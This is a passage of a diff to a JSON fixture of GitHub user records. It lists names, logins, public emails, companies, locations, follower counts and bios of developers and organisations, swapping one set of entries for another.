"https://avatars.githubusercontent.com/u/814070?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2013-08-08T08:24:03Z", - "updated_at": "2021-11-08T14:17:42Z", - "node_id": "MDQ6VXNlcjUxODg1MzA=", + "public_repositories_count": 0, + "created_at": "2011-05-27T11:29:28Z", + "updated_at": "2024-04-30T00:06:17Z", + "node_id": "MDQ6VXNlcjgxNDA3MA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402428,99 +660552,99 @@ }, { "model": "github.user", - "pk": 1688, + "pk": 6986, "fields": { - "nest_created_at": "2024-09-12T00:23:42.310Z", - "nest_updated_at": "2024-09-18T19:03:39.441Z", - "name": "Entur AS", - "login": "entur", + "nest_created_at": "2024-09-22T08:34:37.524Z", + "nest_updated_at": "2024-09-22T18:51:51.210Z", + "name": "Cody", + "login": "codyfyi", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/23213604?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2105157?v=4", "company": "", - "location": "Oslo, Norway", + "location": "Colorado", "collaborators_count": 0, - "following_count": 0, - "followers_count": 89, - "public_gists_count": 0, - "public_repositories_count": 213, - "created_at": "2016-11-02T12:09:58Z", - "updated_at": "2024-05-02T11:55:11Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjIzMjEzNjA0", - "bio": "Together for easy, sustainable journeys. We supply digital services to the public transport in Norway.", + "following_count": 31, + "followers_count": 12, + "public_gists_count": 1, + "public_repositories_count": 65, + "created_at": "2012-08-06T18:37:54Z", + "updated_at": "2024-08-31T14:43:08Z", + "node_id": "MDQ6VXNlcjIxMDUxNTc=", + "bio": "", "is_hireable": false, - "twitter_username": "Entur_AS" + "twitter_username": "codyfyi" } }, { "model": "github.user", - "pk": 1689, + "pk": 6987, "fields": { - "nest_created_at": "2024-09-12T00:23:45.894Z", - "nest_updated_at": "2024-09-18T19:03:42.038Z", - "name": "Thomas Skjølberg", - "login": "skjolber", - "email": "thomas.skjolberg@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1031478?v=4", - "company": "", - "location": "Norge", + "nest_created_at": "2024-09-22T08:34:37.834Z", + "nest_updated_at": "2024-09-22T18:51:51.530Z", + "name": "Cliff Koh", + "login": "cliffkoh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1003246?v=4", + "company": "@microsoft ", + "location": "", "collaborators_count": 0, - "following_count": 19, - "followers_count": 99, - "public_gists_count": 3, - "public_repositories_count": 136, - "created_at": "2011-09-06T23:14:40Z", - "updated_at": "2024-09-16T11:25:10Z", - "node_id": "MDQ6VXNlcjEwMzE0Nzg=", - "bio": "", - "is_hireable": true, + "following_count": 5, + "followers_count": 22, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2011-08-25T05:18:55Z", + "updated_at": "2024-09-19T11:26:49Z", + "node_id": "MDQ6VXNlcjEwMDMyNDY=", + "bio": "Software Engineering @ Microsoft", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1690, + "pk": 6988, "fields": { - "nest_created_at": "2024-09-12T00:23:47.540Z", - "nest_updated_at": "2024-09-18T19:03:43.499Z", - "name": "Jenkins", - "login": "jenkinsci", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/107424?v=4", + "nest_created_at": "2024-09-22T08:34:38.173Z", + "nest_updated_at": "2024-09-22T18:51:51.847Z", + "name": "Clemens Uhlenhut", + "login": "Clemens-U", + "email": "clemens.uhlenhut@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3084514?v=4", "company": "", - "location": "United States of America", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2429, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 2635, - "created_at": "2009-07-21T21:03:50Z", - "updated_at": "2024-08-25T11:21:56Z", - "node_id": "MDEyOk9yZ2FuaXphdGlvbjEwNzQyNA==", - "bio": "Jenkins is an open source automation server with an unparalleled plugin ecosystem to support practically every tool as part of your delivery pipelines", + "public_repositories_count": 9, + "created_at": "2012-12-19T22:02:21Z", + "updated_at": "2021-11-27T16:18:06Z", + "node_id": "MDQ6VXNlcjMwODQ1MTQ=", + "bio": "", "is_hireable": false, - "twitter_username": "jenkinsci" + "twitter_username": "" } }, { "model": "github.user", - "pk": 1691, + "pk": 6989, "fields": { - "nest_created_at": "2024-09-12T00:23:51.071Z", - "nest_updated_at": "2024-09-12T00:23:56.897Z", - "name": "Nikolas Falco", - "login": "nfalco79", + "nest_created_at": "2024-09-22T08:34:38.494Z", + "nest_updated_at": "2024-09-22T18:51:52.160Z", + "name": "Clay Lenhart", + "login": "xclayl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4160180?v=4", - "company": "Finantix", - "location": "Venice", + "avatar_url": "https://avatars.githubusercontent.com/u/232027?v=4", + "company": "", + "location": "Atlanta, GA", "collaborators_count": 0, "following_count": 0, - "followers_count": 12, + "followers_count": 3, "public_gists_count": 1, - "public_repositories_count": 33, - "created_at": "2013-04-15T11:43:06Z", - "updated_at": "2024-09-03T15:36:05Z", - "node_id": "MDQ6VXNlcjQxNjAxODA=", + "public_repositories_count": 15, + "created_at": "2010-03-28T14:02:53Z", + "updated_at": "2024-09-15T23:42:14Z", + "node_id": "MDQ6VXNlcjIzMjAyNw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402528,24 +660652,24 @@ }, { "model": "github.user", - "pk": 1692, + "pk": 6990, "fields": { - "nest_created_at": "2024-09-12T00:24:03.289Z", - "nest_updated_at": "2024-09-12T00:24:03.289Z", - "name": "August Detlefsen", - "login": "augustd", + "nest_created_at": "2024-09-22T08:34:38.805Z", + "nest_updated_at": "2024-09-22T18:51:52.465Z", + "name": "Claudio Beatrice", + "login": "omissis", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1258191?v=4", - "company": "CodeMagi, Inc.", - "location": "Oakland, CA", + "avatar_url": "https://avatars.githubusercontent.com/u/197604?v=4", + "company": "@sysdig", + "location": "Turin, Italy", "collaborators_count": 0, - "following_count": 1, - "followers_count": 61, - "public_gists_count": 0, - "public_repositories_count": 45, - "created_at": "2011-12-12T18:07:31Z", - "updated_at": "2024-05-05T00:44:27Z", - "node_id": "MDQ6VXNlcjEyNTgxOTE=", + "following_count": 146, + "followers_count": 96, + "public_gists_count": 7, + "public_repositories_count": 140, + "created_at": "2010-02-05T11:22:04Z", + "updated_at": "2024-08-28T08:57:40Z", + "node_id": "MDQ6VXNlcjE5NzYwNA==", "bio": "", "is_hireable": true, "twitter_username": "" @@ -402553,149 +660677,124 @@ }, { "model": "github.user", - "pk": 1693, - "fields": { - "nest_created_at": "2024-09-12T00:24:05.704Z", - "nest_updated_at": "2024-09-12T00:24:06.924Z", - "name": "Dale Visser", - "login": "dwvisser", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/490575?v=4", - "company": "", - "location": "", - "collaborators_count": 0, - "following_count": 21, - "followers_count": 21, - "public_gists_count": 2, - "public_repositories_count": 63, - "created_at": "2010-11-21T12:26:57Z", - "updated_at": "2024-08-23T15:21:08Z", - "node_id": "MDQ6VXNlcjQ5MDU3NQ==", - "bio": "I have been a physicist and software engineer. Currently my job title is \"Researcher\", but that still means writing code...", - "is_hireable": false, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1694, + "pk": 6991, "fields": { - "nest_created_at": "2024-09-12T00:24:08.132Z", - "nest_updated_at": "2024-09-12T00:24:34.154Z", - "name": "Vít Šesták", - "login": "v6ak", + "nest_created_at": "2024-09-22T08:34:39.161Z", + "nest_updated_at": "2024-09-22T18:51:52.770Z", + "name": "Christophe Coevoet", + "login": "stof", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/184015?v=4", - "company": "Freelancer", - "location": "Czech Republic", + "avatar_url": "https://avatars.githubusercontent.com/u/439401?v=4", + "company": "@Incenteev", + "location": "Paris", "collaborators_count": 0, - "following_count": 16, - "followers_count": 25, - "public_gists_count": 140, - "public_repositories_count": 54, - "created_at": "2010-01-17T13:14:21Z", - "updated_at": "2024-02-09T13:13:16Z", - "node_id": "MDQ6VXNlcjE4NDAxNQ==", + "following_count": 39, + "followers_count": 2083, + "public_gists_count": 41, + "public_repositories_count": 673, + "created_at": "2010-10-14T13:56:42Z", + "updated_at": "2024-09-12T08:06:19Z", + "node_id": "MDQ6VXNlcjQzOTQwMQ==", "bio": "", "is_hireable": false, - "twitter_username": "v6ak" + "twitter_username": "Stof70" } }, { "model": "github.user", - "pk": 1695, + "pk": 6992, "fields": { - "nest_created_at": "2024-09-12T00:24:09.425Z", - "nest_updated_at": "2024-09-12T00:24:11.103Z", - "name": "Justin Collins", - "login": "presidentbeef", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/75613?v=4", - "company": "", - "location": "\"The Bay\"", + "nest_created_at": "2024-09-22T08:34:39.481Z", + "nest_updated_at": "2024-09-22T18:51:53.078Z", + "name": "Christian Reyes", + "login": "CAReyes", + "email": "christianreyesprof@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/22280630?v=4", + "company": "Amazon", + "location": "Austin, TX", "collaborators_count": 0, - "following_count": 13, - "followers_count": 335, - "public_gists_count": 22, - "public_repositories_count": 83, - "created_at": "2009-04-20T06:03:50Z", - "updated_at": "2024-08-21T05:54:43Z", - "node_id": "MDQ6VXNlcjc1NjEz", - "bio": "I work on Brakeman and do web security stuff.", - "is_hireable": false, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-09-18T19:17:09Z", + "updated_at": "2024-09-19T06:10:07Z", + "node_id": "MDQ6VXNlcjIyMjgwNjMw", + "bio": "", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1696, + "pk": 6993, "fields": { - "nest_created_at": "2024-09-12T00:24:14.764Z", - "nest_updated_at": "2024-09-18T19:08:54.340Z", - "name": "John Melton", - "login": "jtmelton", + "nest_created_at": "2024-09-22T08:34:39.792Z", + "nest_updated_at": "2024-09-22T18:51:53.400Z", + "name": "Chris McCall", + "login": "cmccall", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1624464?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/329958?v=4", "company": "", - "location": "", + "location": "Maryland", "collaborators_count": 0, - "following_count": 7, - "followers_count": 48, - "public_gists_count": 3, - "public_repositories_count": 15, - "created_at": "2012-04-09T02:52:32Z", - "updated_at": "2024-04-26T14:42:01Z", - "node_id": "MDQ6VXNlcjE2MjQ0NjQ=", - "bio": "", + "following_count": 19, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2010-07-12T19:05:43Z", + "updated_at": "2024-06-05T13:22:18Z", + "node_id": "MDQ6VXNlcjMyOTk1OA==", + "bio": "Maryland\r\nCTO", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1697, + "pk": 6994, "fields": { - "nest_created_at": "2024-09-12T00:24:16.035Z", - "nest_updated_at": "2024-09-12T02:39:01.628Z", - "name": "", - "login": "ThrawnCA", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3080440?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:40.117Z", + "nest_updated_at": "2024-09-22T18:51:53.725Z", + "name": "Chris Dias", + "login": "chrisdias", + "email": "cdias@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1487073?v=4", + "company": "@Microsoft ", + "location": "Redmond, WA", "collaborators_count": 0, "following_count": 2, - "followers_count": 20, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2012-12-19T11:47:29Z", - "updated_at": "2024-08-07T22:44:17Z", - "node_id": "MDQ6VXNlcjMwODA0NDA=", - "bio": "Java and Python developer with an interest in web security.", + "followers_count": 191, + "public_gists_count": 5, + "public_repositories_count": 60, + "created_at": "2012-03-01T01:12:33Z", + "updated_at": "2024-09-16T17:36:43Z", + "node_id": "MDQ6VXNlcjE0ODcwNzM=", + "bio": "Visual Studio Code!!", "is_hireable": false, - "twitter_username": "" + "twitter_username": "chrisdias" } }, { "model": "github.user", - "pk": 1698, + "pk": 6995, "fields": { - "nest_created_at": "2024-09-12T00:24:17.276Z", - "nest_updated_at": "2024-09-12T00:24:17.276Z", - "name": "Piyush", - "login": "piyushml20", + "nest_created_at": "2024-09-22T08:34:40.460Z", + "nest_updated_at": "2024-09-22T18:51:54.065Z", + "name": "ChitraKoppolu", + "login": "ChitraKoppolu", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/25953476?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13649999?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 11, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2017-02-22T11:17:55Z", - "updated_at": "2023-10-11T11:24:27Z", - "node_id": "MDQ6VXNlcjI1OTUzNDc2", + "created_at": "2015-08-04T21:44:03Z", + "updated_at": "2018-10-25T20:53:33Z", + "node_id": "MDQ6VXNlcjEzNjQ5OTk5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402703,49 +660802,24 @@ }, { "model": "github.user", - "pk": 1699, - "fields": { - "nest_created_at": "2024-09-12T00:24:20.129Z", - "nest_updated_at": "2024-09-12T00:24:25.054Z", - "name": "Stefan Neuhaus", - "login": "stefanneuhaus", - "email": "stefan@stefanneuhaus.org", - "avatar_url": "https://avatars.githubusercontent.com/u/8896988?v=4", - "company": "", - "location": "Cologne, Germany", - "collaborators_count": 0, - "following_count": 22, - "followers_count": 25, - "public_gists_count": 0, - "public_repositories_count": 35, - "created_at": "2014-09-24T09:51:55Z", - "updated_at": "2024-09-11T11:59:04Z", - "node_id": "MDQ6VXNlcjg4OTY5ODg=", - "bio": "", - "is_hireable": true, - "twitter_username": "" - } -}, -{ - "model": "github.user", - "pk": 1700, + "pk": 6996, "fields": { - "nest_created_at": "2024-09-12T00:24:21.350Z", - "nest_updated_at": "2024-09-12T00:24:21.350Z", - "name": "Eric Kelm", - "login": "asoftwareguy", - "email": "ekelm@planview.com", - "avatar_url": "https://avatars.githubusercontent.com/u/866865?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:40.778Z", + "nest_updated_at": "2024-09-22T18:51:54.381Z", + "name": "Charlie Jonas", + "login": "ChuckJonas", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5217568?v=4", + "company": "Callaway Cloud Consulting", + "location": "wyoming", "collaborators_count": 0, "following_count": 6, - "followers_count": 7, - "public_gists_count": 6, - "public_repositories_count": 13, - "created_at": "2011-06-22T13:17:11Z", - "updated_at": "2022-11-09T21:30:51Z", - "node_id": "MDQ6VXNlcjg2Njg2NQ==", + "followers_count": 173, + "public_gists_count": 28, + "public_repositories_count": 88, + "created_at": "2013-08-13T00:14:04Z", + "updated_at": "2024-09-20T19:38:57Z", + "node_id": "MDQ6VXNlcjUyMTc1Njg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402753,149 +660827,149 @@ }, { "model": "github.user", - "pk": 1701, + "pk": 6997, "fields": { - "nest_created_at": "2024-09-12T00:24:22.633Z", - "nest_updated_at": "2024-09-12T00:24:22.633Z", - "name": "", - "login": "kouryu", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/650002?v=4", + "nest_created_at": "2024-09-22T08:34:41.087Z", + "nest_updated_at": "2024-09-22T18:51:54.696Z", + "name": "Charles Milette", + "login": "sylveon", + "email": "charles.milette@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6440374?v=4", "company": "", - "location": "", + "location": "Montreal, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2011-03-04T00:04:06Z", - "updated_at": "2021-11-30T03:55:28Z", - "node_id": "MDQ6VXNlcjY1MDAwMg==", - "bio": "", + "following_count": 28, + "followers_count": 456, + "public_gists_count": 13, + "public_repositories_count": 26, + "created_at": "2014-01-19T00:25:15Z", + "updated_at": "2024-09-13T12:07:08Z", + "node_id": "MDQ6VXNlcjY0NDAzNzQ=", + "bio": "Once a fight breaks out, it will unflinchingly charge at dragon Pokémon that are many times larger than itself.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sy1ve0n" } }, { "model": "github.user", - "pk": 1702, + "pk": 6998, "fields": { - "nest_created_at": "2024-09-12T00:24:23.840Z", - "nest_updated_at": "2024-09-12T00:24:23.840Z", - "name": "Jiri Popelka", - "login": "jpopelka", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/288686?v=4", - "company": "Red Hat, inc.", - "location": "Brno", + "nest_created_at": "2024-09-22T08:34:41.404Z", + "nest_updated_at": "2024-09-22T18:51:55.003Z", + "name": "Cedric van Putten", + "login": "byCedric", + "email": "github@cedric.dev", + "avatar_url": "https://avatars.githubusercontent.com/u/1203991?v=4", + "company": "@expo", + "location": "Amsterdam", "collaborators_count": 0, - "following_count": 5, - "followers_count": 44, - "public_gists_count": 1, - "public_repositories_count": 194, - "created_at": "2010-05-27T13:50:36Z", - "updated_at": "2024-09-03T14:31:25Z", - "node_id": "MDQ6VXNlcjI4ODY4Ng==", - "bio": "", + "following_count": 103, + "followers_count": 603, + "public_gists_count": 3, + "public_repositories_count": 235, + "created_at": "2011-11-18T09:00:01Z", + "updated_at": "2024-09-16T21:36:23Z", + "node_id": "MDQ6VXNlcjEyMDM5OTE=", + "bio": "Doing stuff with @expo - Creator of need.review - Don't let your memes be dreams", "is_hireable": false, - "twitter_username": "" + "twitter_username": "cedric_dev" } }, { "model": "github.user", - "pk": 1703, + "pk": 6999, "fields": { - "nest_created_at": "2024-09-12T00:24:27.121Z", - "nest_updated_at": "2024-09-12T00:24:27.121Z", - "name": "Dennis Post", - "login": "dennispost", + "nest_created_at": "2024-09-22T08:34:41.719Z", + "nest_updated_at": "2024-09-22T18:51:55.316Z", + "name": "Carlos Mendible", + "login": "cmendible", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1068264?v=4", - "company": "Software Developer @dbsystel ", - "location": "Frankfurt am Main, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/266546?v=4", + "company": "Microsoft", + "location": "Madrid, Spain", "collaborators_count": 0, - "following_count": 27, - "followers_count": 15, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2011-09-21T15:10:42Z", - "updated_at": "2024-05-09T11:15:52Z", - "node_id": "MDQ6VXNlcjEwNjgyNjQ=", - "bio": "", + "following_count": 59, + "followers_count": 224, + "public_gists_count": 15, + "public_repositories_count": 144, + "created_at": "2010-05-06T13:49:14Z", + "updated_at": "2024-09-18T14:40:12Z", + "node_id": "MDQ6VXNlcjI2NjU0Ng==", + "bio": "Principal Cloud Solution Architect @microsoft", "is_hireable": false, - "twitter_username": "" + "twitter_username": "cmendibl3" } }, { "model": "github.user", - "pk": 1704, + "pk": 7000, "fields": { - "nest_created_at": "2024-09-12T00:24:30.461Z", - "nest_updated_at": "2024-09-12T00:24:30.461Z", - "name": "", - "login": "najibk", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6780148?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:42.041Z", + "nest_updated_at": "2024-09-22T18:51:55.635Z", + "name": "Caleb Jasik", + "login": "jasikpark", + "email": "calebjasik@jasik.xyz", + "avatar_url": "https://avatars.githubusercontent.com/u/10626596?v=4", + "company": "@DefinedNet", + "location": "Texas", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-02-25T08:16:49Z", - "updated_at": "2024-07-20T17:25:59Z", - "node_id": "MDQ6VXNlcjY3ODAxNDg=", - "bio": "", - "is_hireable": false, - "twitter_username": "" + "following_count": 460, + "followers_count": 103, + "public_gists_count": 25, + "public_repositories_count": 161, + "created_at": "2015-01-21T06:09:20Z", + "updated_at": "2024-09-18T20:54:59Z", + "node_id": "MDQ6VXNlcjEwNjI2NTk2", + "bio": "vibin'", + "is_hireable": true, + "twitter_username": "calebjasik" } }, { "model": "github.user", - "pk": 1705, + "pk": 7001, "fields": { - "nest_created_at": "2024-09-12T00:24:31.705Z", - "nest_updated_at": "2024-09-12T02:40:36.237Z", - "name": "Jeremy Landis", - "login": "hazendaz", - "email": "jeremylandis@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/975267?v=4", - "company": "", - "location": "USA", + "nest_created_at": "2024-09-22T08:34:42.355Z", + "nest_updated_at": "2024-09-22T18:51:55.961Z", + "name": "Dave Cardwell", + "login": "davecardwell", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7639?v=4", + "company": "@usecanopy", + "location": "Orlando, FL", "collaborators_count": 0, - "following_count": 16, - "followers_count": 173, - "public_gists_count": 1, - "public_repositories_count": 199, - "created_at": "2011-08-12T03:29:19Z", - "updated_at": "2024-08-09T11:20:10Z", - "node_id": "MDQ6VXNlcjk3NTI2Nw==", - "bio": "Java EE developer since 2009 and DevOps since 2017", - "is_hireable": false, - "twitter_username": "" + "following_count": 4, + "followers_count": 14, + "public_gists_count": 5, + "public_repositories_count": 28, + "created_at": "2008-04-16T23:15:40Z", + "updated_at": "2024-08-30T23:59:35Z", + "node_id": "MDQ6VXNlcjc2Mzk=", + "bio": "", + "is_hireable": true, + "twitter_username": "davecardwell" } }, { "model": "github.user", - "pk": 1706, + "pk": 7002, "fields": { - "nest_created_at": "2024-09-12T00:24:35.408Z", - "nest_updated_at": "2024-09-12T00:24:35.408Z", + "nest_created_at": "2024-09-22T08:34:42.667Z", + "nest_updated_at": "2024-09-22T18:51:56.270Z", "name": "", - "login": "tkep", + "login": "dmk2014", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/37106431?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6460241?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2018-03-06T10:43:21Z", - "updated_at": "2018-03-06T10:43:21Z", - "node_id": "MDQ6VXNlcjM3MTA2NDMx", + "public_repositories_count": 5, + "created_at": "2014-01-21T12:39:17Z", + "updated_at": "2024-03-24T12:33:52Z", + "node_id": "MDQ6VXNlcjY0NjAyNDE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402903,174 +660977,174 @@ }, { "model": "github.user", - "pk": 1707, + "pk": 7003, "fields": { - "nest_created_at": "2024-09-12T00:24:37.030Z", - "nest_updated_at": "2024-09-12T00:24:38.249Z", - "name": "Ernst de Haan", - "login": "znerd", + "nest_created_at": "2024-09-22T08:34:42.983Z", + "nest_updated_at": "2024-09-22T18:51:56.596Z", + "name": "Daniel Zhang", + "login": "DanielHZhang", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117866?v=4", - "company": "Mindcurv", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/30360288?v=4", + "company": "", + "location": "Toronto, Ontario, Canada", "collaborators_count": 0, - "following_count": 10, - "followers_count": 27, - "public_gists_count": 10, - "public_repositories_count": 49, - "created_at": "2009-08-21T11:18:13Z", - "updated_at": "2024-07-26T11:22:33Z", - "node_id": "MDQ6VXNlcjExNzg2Ng==", + "following_count": 24, + "followers_count": 25, + "public_gists_count": 4, + "public_repositories_count": 36, + "created_at": "2017-07-22T00:51:17Z", + "updated_at": "2024-09-22T17:30:49Z", + "node_id": "MDQ6VXNlcjMwMzYwMjg4", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1708, + "pk": 7004, "fields": { - "nest_created_at": "2024-09-12T00:24:43.276Z", - "nest_updated_at": "2024-09-12T00:24:43.276Z", - "name": "Jonny Griffin", - "login": "jonny-wg2", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/39831372?v=4", - "company": "Cisco", - "location": "Oslo, Norway", + "nest_created_at": "2024-09-22T08:34:43.325Z", + "nest_updated_at": "2024-09-22T18:51:56.907Z", + "name": "Daniël Sonck", + "login": "dsonck92", + "email": "daniel@sonck.nl", + "avatar_url": "https://avatars.githubusercontent.com/u/1695179?v=4", + "company": "Thyra Inflatables", + "location": "Enschede, The Netherlands", "collaborators_count": 0, "following_count": 5, - "followers_count": 5, - "public_gists_count": 1, - "public_repositories_count": 23, - "created_at": "2018-06-01T12:52:31Z", - "updated_at": "2024-09-04T08:27:16Z", - "node_id": "MDQ6VXNlcjM5ODMxMzcy", - "bio": "Security Engineer", + "followers_count": 4, + "public_gists_count": 6, + "public_repositories_count": 59, + "created_at": "2012-05-01T11:06:43Z", + "updated_at": "2024-08-03T12:45:36Z", + "node_id": "MDQ6VXNlcjE2OTUxNzk=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "dsonck92" } }, { "model": "github.user", - "pk": 1709, + "pk": 7005, "fields": { - "nest_created_at": "2024-09-12T00:24:45.658Z", - "nest_updated_at": "2024-09-12T00:24:45.658Z", - "name": "Christopher Schultz", - "login": "ChristopherSchultz", + "nest_created_at": "2024-09-22T08:34:43.640Z", + "nest_updated_at": "2024-09-22T18:51:57.210Z", + "name": "Daniel Rosenwasser", + "login": "DanielRosenwasser", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12199769?v=4", - "company": "CHADIS, Inc.", - "location": "Arlington, VA", + "avatar_url": "https://avatars.githubusercontent.com/u/972891?v=4", + "company": "@Microsoft", + "location": "Seattle, WA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 33, - "public_gists_count": 0, - "public_repositories_count": 28, - "created_at": "2015-05-01T14:24:06Z", - "updated_at": "2024-07-18T17:30:13Z", - "node_id": "MDQ6VXNlcjEyMTk5NzY5", - "bio": "", + "following_count": 18, + "followers_count": 2264, + "public_gists_count": 6, + "public_repositories_count": 173, + "created_at": "2011-08-11T02:09:39Z", + "updated_at": "2024-09-16T11:24:57Z", + "node_id": "MDQ6VXNlcjk3Mjg5MQ==", + "bio": "Principal Product Manager of TypeScript", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1710, + "pk": 7006, "fields": { - "nest_created_at": "2024-09-12T00:24:46.911Z", - "nest_updated_at": "2024-09-12T00:24:46.911Z", - "name": "German Suarez Alonso", - "login": "Yermanaco", - "email": "german.suarezalonso@telefonica.com", - "avatar_url": "https://avatars.githubusercontent.com/u/42812080?v=4", - "company": "Telefonica", - "location": "Madrid", + "nest_created_at": "2024-09-22T08:34:43.960Z", + "nest_updated_at": "2024-09-22T18:51:57.520Z", + "name": "Daniel Oxman", + "login": "doxman", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4625737?v=4", + "company": "", + "location": "Waterloo, ON, Canada", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2018-08-29T15:48:55Z", - "updated_at": "2024-09-06T10:22:53Z", - "node_id": "MDQ6VXNlcjQyODEyMDgw", - "bio": "", - "is_hireable": false, + "public_repositories_count": 18, + "created_at": "2013-06-06T00:02:28Z", + "updated_at": "2024-09-10T16:21:48Z", + "node_id": "MDQ6VXNlcjQ2MjU3Mzc=", + "bio": "Primarily a web developer; looking to branch out into game development as well.", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1711, + "pk": 7007, "fields": { - "nest_created_at": "2024-09-12T00:24:48.150Z", - "nest_updated_at": "2024-09-12T00:24:48.150Z", - "name": "Simona Avornicesei", - "login": "savornicesei", - "email": "simona@avornicesei.com", - "avatar_url": "https://avatars.githubusercontent.com/u/917232?v=4", - "company": "", - "location": "Cluj-Napoca, România", + "nest_created_at": "2024-09-22T08:34:44.269Z", + "nest_updated_at": "2024-09-22T18:51:57.836Z", + "name": "Daniel Compton", + "login": "danielcompton", + "email": "desk+github@danielcompton.net", + "avatar_url": "https://avatars.githubusercontent.com/u/811954?v=4", + "company": "@WhimsicalCode", + "location": "Morrinsville, New Zealand", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, - "public_gists_count": 3, - "public_repositories_count": 10, - "created_at": "2011-07-15T09:06:56Z", - "updated_at": "2024-08-25T11:22:36Z", - "node_id": "MDQ6VXNlcjkxNzIzMg==", - "bio": "", + "following_count": 52, + "followers_count": 314, + "public_gists_count": 19, + "public_repositories_count": 247, + "created_at": "2011-05-26T12:23:41Z", + "updated_at": "2024-09-22T16:14:47Z", + "node_id": "MDQ6VXNlcjgxMTk1NA==", + "bio": "Building Clojurists Together, open source Clojure projects, and Clojars.", "is_hireable": false, - "twitter_username": "savornicesei" + "twitter_username": "danielwithmusic" } }, { "model": "github.user", - "pk": 1712, + "pk": 7008, "fields": { - "nest_created_at": "2024-09-12T00:24:49.364Z", - "nest_updated_at": "2024-09-12T00:24:49.364Z", - "name": "Jason", - "login": "cognitiaclaeves", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/8933161?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:44.585Z", + "nest_updated_at": "2024-09-22T18:51:58.145Z", + "name": "Daniel Cazzulino", + "login": "kzu", + "email": "daniel@cazzulino.com", + "avatar_url": "https://avatars.githubusercontent.com/u/169707?v=4", + "company": "@devlooped", + "location": "Buenos Aires, Argentina", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, - "public_gists_count": 18, - "public_repositories_count": 75, - "created_at": "2014-09-26T20:54:26Z", - "updated_at": "2024-08-17T11:24:18Z", - "node_id": "MDQ6VXNlcjg5MzMxNjE=", - 